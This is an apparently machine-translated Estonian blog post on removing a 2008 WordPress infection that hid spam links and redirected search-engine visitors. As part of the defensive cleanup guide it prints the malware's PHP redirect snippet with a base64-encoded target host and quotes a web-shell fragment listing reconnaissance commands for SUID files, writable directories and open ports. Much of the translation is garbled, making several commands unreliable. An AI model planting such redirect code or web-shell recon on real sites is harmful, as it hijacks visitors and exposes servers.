Viimase kuu olen saanud hoiatusi viirus blogi mõnel külastajaid. Esialgu ma ignoreeris hoiatusi, sest ma installitud päris hea viirusetõrje (Kaspersky AV 2009) Ja kuigi blogi pikka aega, ma ei ole kunagi saanud viiruse alert (.. Ma nägin midagi kahtlast varem, et esimene värskenda kadunud. Lõpuks ...).
Aeglaselt hakkasid ilmuma suured erinevused külastaja liiklustPärast mida liiklus viimasel ajal on pidevalt vähenenud ja hakkas üha rohkem inimesi, kes ütlevad mulle, et stealthsettingsCom see on virused. Eile sain kelleltki screenshot teha, kui viirusetõrje blokeeritud käsikiri pärit stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. See oli päris veenev mulle, et ma panin kõik allikatest otsida. Esimene mõte, mis tuli minu arvates oli teha upgrade uusim versioon WordPress (2.5.1), kuid mitte enne kõigi vanas skriptis olevate failide kustutamist WordPress ja teha varukoopia andmebaasi. See protseduur ei töötanud ja ilmselt võttis mul kaua aega, et aru saada, kus viga asub, kui see poleks mulle öelnud. Eugen aastal arutelu selle üle, kohv, leidis ta, link Google ja oleks hea, et teda näha.
MyDigitalLife.info avaldas artikli pealkirjaga: “WordPress Häkkimine: Google'i ja otsingumootori taastamine ja parandamine või küpsiste liikluse puudumine, mis suunatakse ümber saidile Your-Needs.info, AnyResults.Net, Golden-Info.net ja muudele ebaseaduslikele saitidele"See on lõpuks niit ma vajasin.
See on umbes ära kasutama de WordPress küpsiste põhjal, Mis minu arvates on väga keeruline ja tehtud raamat. Nii tark, et teha SQL Injection Andmebaas blogi, luua nähtamatu kasutaja lihtne rutiinne kontroll armatuurlaud->kasutajad, kontrollida serveri katalooge ja faile "kirjutatav" (see chmod 777), otsida ja otsida täitma faile privileege root kasutaja või grupp. Ma ei tea, kes ära nimi ja vaata, et vähe on artikleid kirjutanud temast, hoolimata asjaolust, et paljud blogid on nakatunud, kaasa arvatud Rumeenia. Ok ... Ma püüan seletada üldsõnaliseks viiruse kohta.
Mis on viirus?
Esmalt sisestage allikas lehekülgi blogisid, lingid nähtamatu külastajatele, vaid nähtav ja indexable otsingumootorid, eriti Google. Sel viisil üle lehekülje auaste saitidel näidatud ründaja. Teiseks lisatakse teine ümbersuunamine kood URL külastajad tulevad Google, Live, Yahoo, ... või RSS lugeja ja mitte ala küpsis. viirusetõrje tuvastab suunata nii Trojan-Clicker.HTML.
Sümptomid:
Massive langus külastajate liiklust, Eriti blogisid, kus on kõige rohkem külastajaid tulema Google.
Määramine: (see on koht, kus probleem muutub keeruliseks neile, kes ei tea phpmyadminist, php-st ja linux)
LA. TÄHELEPANU! Esimene teha varukoopia andmebaasi!
1. Kontrollige allikas faile index.php, header.php, footer.php, Blogi teema ja vaata, kas seal on kood, mis kasutab kodeerimist base64 või sisaldab vormi “if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”kujul:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... Või midagi. Kustuta see kood!
Klõpsa pilti ...
Ülaltoodud ekraanipildil valisin kogemata ja " ". See kood peab jääma.
2. Kasutama phpMyAdmin ja minna andmebaasi tabeli wp_usersKui vaadata, kui puudub kasutajatunnus luuakse 00:00:00 0000-00-00 (Võimalik paigutus USER_LOGIN kirjutama "WordPress”. Kirjutage üles selle kasutaja ID (ID väli) ja seejärel kustutage see.
Klõpsa pilti ...
* Roheline joon tuleb eemaldada ja alles tema ID. Puhul unineKas ID = 8 .
3. Mine tabel wp_usermeta, Kus asub ja eemaldama read ID (kui valdkonna USER_ID ID väärtus on kustutatud).
4. Tabelis wp_option, Ava active_plugins ja vaata, mis plugin on lubatud kahtlusalune. Seda saab kasutada nagu lõpud _old.giff, _old.pngg, _old.jpeg, _new.php.giffjne rikkalike pildilaiendite kombinatsioonid funktsioonidega _old ja _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Kustutage see pistikprogramm ja minge siis ajaveebi -> Armatuurlaud -> Pluginad, kus desaktiveerite ja aktiveerite kõik pistikprogrammid.
Kliki pildile, et näha tundub active_plugins viiruse faili.
Jälgi teed on FTP või SSH, märgitud active_plugins ja kustutab faili serverisse.
5. Kõik phpMyAdmin, tabelis wp_option, Leida ja kustutada rida sisaldab "rss_f541b3abd05e7962fcab37737f40fad8"Ja vahel"internal_links_cache ".
In internal_links_cache tehakse krüpteeritud rämpsposti lingid, mis ilmuvad oma blogis ja kood Google Adskukal, Häkker.
6. Soovitatud on Parooli muutmine Blogi ja login eemaldada kõik kahtlased userele. Minge üle uusimale versioonile WordPress ja määrake ajaveebi uute kasutajate registreerimine lõpetama. Kadu pole... nad võivad kommenteerida ka asustamata.
Püüdsin eespool veidi selgitada, mida sellises olukorras teha, et blogi sellest viirusest puhastada. Probleem on palju tõsisem, kui tundub, ja pole peaaegu lahendatud, sest neid kasutatakse turvahaavatavusi veebiserveri hosting, mis on blogi.
Esimese turvameetmeid, kellel on juurdepääs SSHTee mõned kontroll server, et näha kas kõik failid nagu * _old * ja * _new. * Mis lõpud.GIFF. JPEG. pngg. jpgg. Need failid tuleks kustutada. Kui teil ümbernimetamiseks faili, näiteks. top_right_old.giff in top_right_old.phpMe näeme, et fail on täpselt kasutada koodi server.
Mõned kasulikud juhised serveri kontrollimiseks, puhastamiseks ja turvamiseks. (SSH kaudu)
1. cd / tmp ja vaadata, kas on kaustad nagu tmpVFlma või muud kombinatsioonid on sama nimi ja kustutada. Vaadake pildil kaks sellist kaustu mind:
rm-rf foldername
2. Kontrollige ja eemaldage (muutke chmod-ul) võimalikult atribuutidega kaustu chmod 777
Leia kõik kirjutatavad failid praegusest kaustast: Otsi. -Type F-perm-2-LS
kõik kirjutatav kataloogid praegune dir: Otsi. -Type D-perm-2-LS
Leia kõik kirjutatavad kataloogid ja failid praegusest kaustast: Otsi. -Perm-2-LS
3. Otsid kahtlasi faile serverisse.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, TÄHELEPANU! failid, mis seati natuke SUID si SGID. Need failid täita koos privileegid kasutaja (grupp) või juurtest, mitte kasutaja, kes täidavad faili. Need failid võivad põhjustada root kompromiss, kui julgeolekuküsimustes. Kui kasutad faile SUID ja SGID bitti, täitma "chmod 0 " või eemaldada pakend sisaldab neid.
Kasutada sisaldab kusagil allikas ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Sel viisil ... põhiliselt leiab rikkumisi turvalisus. Ports avatud kataloogid "kirjutatav" ja grupp täitmise privileegid faili / root.
Tagasi enam ...
Mõned blogid nakatunud: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... Nimekiri läheb edasi ... palju.
Google'i otsingumootori abil saate kontrollida, kas ajaveeb on nakatunud. kopeeri kleebi:
site www.blegoo.com osta
Head ööd ja head tööd;) Varsti arvan, et Eugen tuleb uudistega, aadressil prevezibil.imprevizibil.com
BRB :)
TÄHELEPANU! Teema muutmine WordPress või uuendada WordPress 2.5.1, EI OLE lahendus sellest viirusest vabanemiseks.
